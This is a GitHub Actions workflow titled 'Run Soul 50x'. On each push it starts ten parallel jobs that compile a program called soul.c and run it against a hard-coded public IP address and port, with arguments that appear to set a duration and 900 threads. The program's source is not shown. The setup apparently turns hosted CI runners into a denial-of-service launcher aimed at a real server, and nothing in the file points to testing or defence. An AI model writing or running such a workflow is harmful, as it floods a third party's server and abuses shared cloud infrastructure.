name: Run Soul 50x

on: [push]

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10]
    steps:
      - uses: actions/checkout@v3
      - run: gcc soul.c -o soul -lssl -lcrypto -lpthread
      - run: ./soul 20.198.79.107 27582 180 900 -1
